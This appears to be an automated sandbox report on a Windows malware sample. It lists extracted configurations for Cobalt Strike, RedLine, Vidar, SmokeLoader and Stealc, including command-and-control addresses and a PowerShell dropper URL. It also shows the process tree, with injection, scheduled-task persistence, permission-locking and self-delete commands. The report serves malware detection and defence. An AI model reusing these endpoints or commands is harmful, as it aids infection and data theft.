cobaltstrike | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
22s
max time network
602s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
09-06-2023 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Score

10^/10

cobaltstrike redline sectoprat smokeloader stealc vidar 0 100000 1223 a64ca0c195d3c6bc2a04ada079183388 duha tds zxc1 backdoor evasion infostealer rat stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

cobaltstrike

http://43.153.222.28:4646/c9uL

Attributes

user_agent
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)

Extracted

Family

cobaltstrike

Botnet

100000

http://43.153.222.28:4646/push

Attributes

access_type
512
host
43.153.222.28,/push
http_header1
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_header2
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_method1
GET
http_method2
POST
polling_time
60000
port_number
4646
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCPwjCZRkIjRN92nugrS5l0384q/BWQnN0JKM8QSNJru7gg5JibPdKhwgWse4/vRHpd9eu0wpSN1kxhMXC0GOhRg/TRyv5q41zzWurCIOHq13S55c+J/27HYD/DBLtL+5BWbXx9lhM38OGBxcVec4FxCLotANPMB+vOv/rVa32tYQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
uri
/submit.php
user_agent
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)
watermark
100000

Extracted

Family

cobaltstrike

Botnet

Attributes

watermark
0

Extracted

Family

redline

Botnet

TDS

51.79.184.226:25676

Attributes

auth_value
e889b0d7bd655b548c29ef635ce69d26

Extracted

Family

vidar

Version

4.2

Botnet

a64ca0c195d3c6bc2a04ada079183388

https://steamcommunity.com/profiles/76561199511129510

https://t.me/rechnungsbetrag

Attributes

profile_id_v2
a64ca0c195d3c6bc2a04ada079183388
user_agent
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.38 Safari/537.36 Brave/75

Extracted

Family

redline

Botnet

1223

80.85.241.28:36723

Attributes

auth_value
1162933edb12f699eedc4c04dd76667a

Extracted

Family

redline

Botnet

zxc1

194.50.153.103:47128

Attributes

auth_value
842f769e02ef52dcf9aa57e5c8d3d07b

Extracted

Family

smokeloader

Version

2022

http://aapu.at/tmp/

http://poudineh.com/tmp/

http://firsttrusteedrx.ru/tmp/

http://kingpirate.ru/tmp/

rc4.i32

Extracted

Family

stealc

http://45.15.157.6/9827126d94c3e848.php

Extracted

Family

redline

Botnet

duha

83.97.73.129:19068

Attributes

auth_value
aafe99874c3b8854069470882e00246c

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike

Detects Stealc stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/308-1318-0x0000000000700000-0x000000000092A000-memory.dmp	family_stealc
behavioral1/memory/308-1336-0x0000000000700000-0x000000000092A000-memory.dmp	family_stealc
behavioral1/memory/308-1370-0x0000000000700000-0x000000000092A000-memory.dmp	family_stealc

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4700-207-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral1/memory/212-290-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral1/memory/4676-1024-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4916-218-0x0000000000400000-0x000000000047C000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 10 IoCs

Processes:

1IC.exe2.1.1.0_cr.exembn07.exeSCREEN.exept274.exelui06.exejimmy3kcr.exewtrelaxing.exegnilcr.exeDeathmatics.exe

pid	process
4908	1IC.exe
1704	2.1.1.0_cr.exe
4564	mbn07.exe
3832	SCREEN.exe
992	pt274.exe
4656	lui06.exe
708	jimmy3kcr.exe
1060	wtrelaxing.exe
1484	gnilcr.exe
1208	Deathmatics.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

405 ipinfo.io
406 ipinfo.io
569 ip-api.com
37 ip-api.com
216 checkip.dyndns.org
313 checkip.dyndns.org

flow	ioc
405	ipinfo.io
406	ipinfo.io
569	ip-api.com
37	ip-api.com
216	checkip.dyndns.org
313	checkip.dyndns.org

Suspicious use of SetThreadContext 7 IoCs

Processes:

mbn07.exeSCREEN.exept274.exejimmy3kcr.exelui06.exewtrelaxing.exegnilcr.exe

description	pid	process	target process
PID 4564 set thread context of 4724	4564	mbn07.exe	vbc.exe
PID 3832 set thread context of 972	3832	SCREEN.exe	vbc.exe
PID 992 set thread context of 1780	992	pt274.exe	Conhost.exe
PID 708 set thread context of 4700	708	jimmy3kcr.exe	vbc.exe
PID 4656 set thread context of 4916	4656	lui06.exe	vbc.exe
PID 1060 set thread context of 3092	1060	wtrelaxing.exe	ghjkl.exe
PID 1484 set thread context of 212	1484	gnilcr.exe	vbc.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5844 sc.exe
1344 sc.exe
2468 sc.exe
4824 sc.exe
4800 sc.exe
5484 sc.exe
5704 sc.exe
5412 sc.exe
2408 sc.exe
5396 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
5844	sc.exe
1344	sc.exe
2468	sc.exe
4824	sc.exe
4800	sc.exe
5484	sc.exe
5704	sc.exe
5412	sc.exe
2408	sc.exe
5396	sc.exe

Program crash 19 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3676	308	WerFault.exe	vbc.exe
5036	3820	WerFault.exe	i3599072.exe
4568	4212	WerFault.exe	a0310567.exe
1876	1472	WerFault.exe	j4949779.exe
4416	4284	WerFault.exe	bld_4.exe
5824	5812	WerFault.exe	j6801656.exe
5240	4692	WerFault.exe	game.exe
5764	5460	WerFault.exe	b7201524.exe
3720	5976	WerFault.exe	Caspol.exe
704	6888	WerFault.exe
308	6888	WerFault.exe
6988	1108	WerFault.exe
3752	1108	WerFault.exe
7184	8120	WerFault.exe
7312	5968	WerFault.exe
6276	3040	WerFault.exe	Firefox.exe
8976	4756	WerFault.exe	combo.exe
5168	2356	WerFault.exe	e8888074.exe
6660	8848	WerFault.exe

NSIS installer 1 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4816 schtasks.exe
5876 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

6236 tasklist.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

6636 ipconfig.exe
5688 ipconfig.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5288 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

5576 PING.EXE
4152 PING.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

vbc.exe

pid process

4700 vbc.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

a.exevbc.exevbc.exe

description pid process

Token: SeDebugPrivilege 3900 a.exe
Token: SeDebugPrivilege 4700 vbc.exe
Token: SeDebugPrivilege 4916 vbc.exe

pid	process
4816	schtasks.exe
5876	schtasks.exe

pid	process
6236	tasklist.exe

pid	process
6636	ipconfig.exe
5688	ipconfig.exe

pid	process
5288	taskkill.exe

pid	process
5576	PING.EXE
4152	PING.EXE

pid	process
4700	vbc.exe

description	pid	process
Token: SeDebugPrivilege	3900	a.exe
Token: SeDebugPrivilege	4700	vbc.exe
Token: SeDebugPrivilege	4916	vbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a.exembn07.exeSCREEN.exept274.exejimmy3kcr.exelui06.exe

description	pid	process	target process
PID 3900 wrote to memory of 4908	3900	a.exe	1IC.exe
PID 3900 wrote to memory of 4908	3900	a.exe	1IC.exe
PID 3900 wrote to memory of 1704	3900	a.exe	2.1.1.0_cr.exe
PID 3900 wrote to memory of 1704	3900	a.exe	2.1.1.0_cr.exe
PID 3900 wrote to memory of 1704	3900	a.exe	2.1.1.0_cr.exe
PID 3900 wrote to memory of 4564	3900	a.exe	mbn07.exe
PID 3900 wrote to memory of 4564	3900	a.exe	mbn07.exe
PID 3900 wrote to memory of 4564	3900	a.exe	mbn07.exe
PID 3900 wrote to memory of 3832	3900	a.exe	SCREEN.exe
PID 3900 wrote to memory of 3832	3900	a.exe	SCREEN.exe
PID 3900 wrote to memory of 3832	3900	a.exe	SCREEN.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 4564 wrote to memory of 4724	4564	mbn07.exe	vbc.exe
PID 3900 wrote to memory of 992	3900	a.exe	pt274.exe
PID 3900 wrote to memory of 992	3900	a.exe	pt274.exe
PID 3900 wrote to memory of 992	3900	a.exe	pt274.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 3832 wrote to memory of 972	3832	SCREEN.exe	vbc.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 992 wrote to memory of 1780	992	pt274.exe	Conhost.exe
PID 3900 wrote to memory of 4656	3900	a.exe	lui06.exe
PID 3900 wrote to memory of 4656	3900	a.exe	lui06.exe
PID 3900 wrote to memory of 4656	3900	a.exe	lui06.exe
PID 3900 wrote to memory of 708	3900	a.exe	jimmy3kcr.exe
PID 3900 wrote to memory of 708	3900	a.exe	jimmy3kcr.exe
PID 3900 wrote to memory of 708	3900	a.exe	jimmy3kcr.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 708 wrote to memory of 4700	708	jimmy3kcr.exe	vbc.exe
PID 4656 wrote to memory of 4916	4656	lui06.exe	vbc.exe
PID 4656 wrote to memory of 4916	4656	lui06.exe	vbc.exe
PID 4656 wrote to memory of 4916	4656	lui06.exe	vbc.exe
PID 4656 wrote to memory of 4916	4656	lui06.exe	vbc.exe
PID 4656 wrote to memory of 4916	4656	lui06.exe	vbc.exe
PID 4656 wrote to memory of 4916	4656	lui06.exe	vbc.exe
PID 4656 wrote to memory of 4916	4656	lui06.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3900

C:\Users\Admin\AppData\Local\Temp\a\1IC.exe
"C:\Users\Admin\AppData\Local\Temp\a\1IC.exe"
2⤵
- Executes dropped EXE
PID:4908

C:\Users\Admin\AppData\Local\Temp\a\2.1.1.0_cr.exe
"C:\Users\Admin\AppData\Local\Temp\a\2.1.1.0_cr.exe"
2⤵
- Executes dropped EXE
PID:1704

C:\Users\Admin\AppData\Local\Temp\a\mbn07.exe
"C:\Users\Admin\AppData\Local\Temp\a\mbn07.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\a\SCREEN.exe
"C:\Users\Admin\AppData\Local\Temp\a\SCREEN.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\a\pt274.exe
"C:\Users\Admin\AppData\Local\Temp\a\pt274.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:1780

C:\Users\Admin\AppData\Local\Temp\a\lui06.exe
"C:\Users\Admin\AppData\Local\Temp\a\lui06.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Users\Admin\AppData\Local\Temp\a\jimmy3kcr.exe
"C:\Users\Admin\AppData\Local\Temp\a\jimmy3kcr.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:708

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Users\Admin\AppData\Local\Temp\a\wtrelaxing.exe
"C:\Users\Admin\AppData\Local\Temp\a\wtrelaxing.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:3092

C:\Users\Admin\AppData\Local\Temp\a\gnilcr.exe
"C:\Users\Admin\AppData\Local\Temp\a\gnilcr.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1484

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\a\Deathmatics.exe
"C:\Users\Admin\AppData\Local\Temp\a\Deathmatics.exe"
2⤵
- Executes dropped EXE
PID:1208

C:\Users\Admin\AppData\Local\Temp\ws.exe
"C:\Users\Admin\AppData\Local\Temp\ws.exe"
3⤵
PID:4112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\ws.exe"
4⤵
PID:1864

C:\Windows\system32\chcp.com
chcp 65001
5⤵
PID:3684

C:\Windows\system32\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4152

C:\Users\Admin\AppData\Local\Temp\a\msbhv07.exe
"C:\Users\Admin\AppData\Local\Temp\a\msbhv07.exe"
2⤵
PID:4896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:3500

C:\Users\Admin\AppData\Local\Temp\a\tehpoddejrka06.exe
"C:\Users\Admin\AppData\Local\Temp\a\tehpoddejrka06.exe"
2⤵
PID:1412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:196

C:\Users\Admin\AppData\Local\Temp\a\FineC0de.exe
"C:\Users\Admin\AppData\Local\Temp\a\FineC0de.exe"
2⤵
PID:1152

C:\Users\Admin\AppData\Local\Temp\a\FineC0de.exe
"C:\Users\Admin\AppData\Local\Temp\a\FineC0de.exe"
3⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\a\apapcr.exe
"C:\Users\Admin\AppData\Local\Temp\a\apapcr.exe"
2⤵
PID:4140

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:1300

C:\Users\Admin\AppData\Local\Temp\a\crona.exe
"C:\Users\Admin\AppData\Local\Temp\a\crona.exe"
2⤵
PID:2136

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
3⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\a\shiningcr.exe
"C:\Users\Admin\AppData\Local\Temp\a\shiningcr.exe"
2⤵
PID:3088

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\a\aee5f213.exe
"C:\Users\Admin\AppData\Local\Temp\a\aee5f213.exe"
2⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\a\oteratar07.exe
"C:\Users\Admin\AppData\Local\Temp\a\oteratar07.exe"
2⤵
PID:3916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 308 -s 172
4⤵
- Program crash
PID:3676

C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe
"C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe"
2⤵
PID:2176

C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe
"C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe"
3⤵
PID:4304

C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe
"C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe"
2⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe
"C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe"
3⤵
PID:5492

C:\Users\Admin\AppData\Local\Temp\a\mobsync.exe
"C:\Users\Admin\AppData\Local\Temp\a\mobsync.exe"
2⤵
PID:1544

C:\Users\Admin\AppData\Local\Temp\a\foto124.exe
"C:\Users\Admin\AppData\Local\Temp\a\foto124.exe"
2⤵
PID:1732

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x9669786.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x9669786.exe
3⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2669494.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2669494.exe
4⤵
PID:3644

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f5273058.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f5273058.exe
5⤵
PID:2716

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\g1136368.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\g1136368.exe
5⤵
PID:1876

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\h7309409.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\h7309409.exe
4⤵
PID:1036

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
"C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe"
5⤵
PID:1788

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
6⤵
- Creates scheduled task(s)
PID:4816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "lamod.exe" /P "Admin:N"&&CACLS "lamod.exe" /P "Admin:R" /E&&echo Y|CACLS "..\a9e2a16078" /P "Admin:N"&&CACLS "..\a9e2a16078" /P "Admin:R" /E&&Exit
6⤵
PID:4124

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:4416

C:\Windows\SysWOW64\cacls.exe
CACLS "lamod.exe" /P "Admin:N"
7⤵
PID:824

C:\Windows\SysWOW64\cacls.exe
CACLS "lamod.exe" /P "Admin:R" /E
7⤵
PID:1216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:5916

C:\Windows\SysWOW64\cacls.exe
CACLS "..\a9e2a16078" /P "Admin:N"
7⤵
PID:4316

C:\Windows\SysWOW64\cacls.exe
CACLS "..\a9e2a16078" /P "Admin:R" /E
7⤵
PID:388

C:\Users\Admin\AppData\Local\Temp\1000003051\foto124.exe
"C:\Users\Admin\AppData\Local\Temp\1000003051\foto124.exe"
6⤵
PID:4164

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x9669786.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x9669786.exe
7⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\x2669494.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\x2669494.exe
8⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\f5273058.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\f5273058.exe
9⤵
PID:1292

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\g1136368.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\g1136368.exe
9⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\h7309409.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\h7309409.exe
8⤵
PID:5760

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\i3599072.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\i3599072.exe
7⤵
PID:4348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
8⤵
PID:376

C:\Users\Admin\AppData\Local\Temp\1000004051\fotod25.exe
"C:\Users\Admin\AppData\Local\Temp\1000004051\fotod25.exe"
6⤵
PID:3604

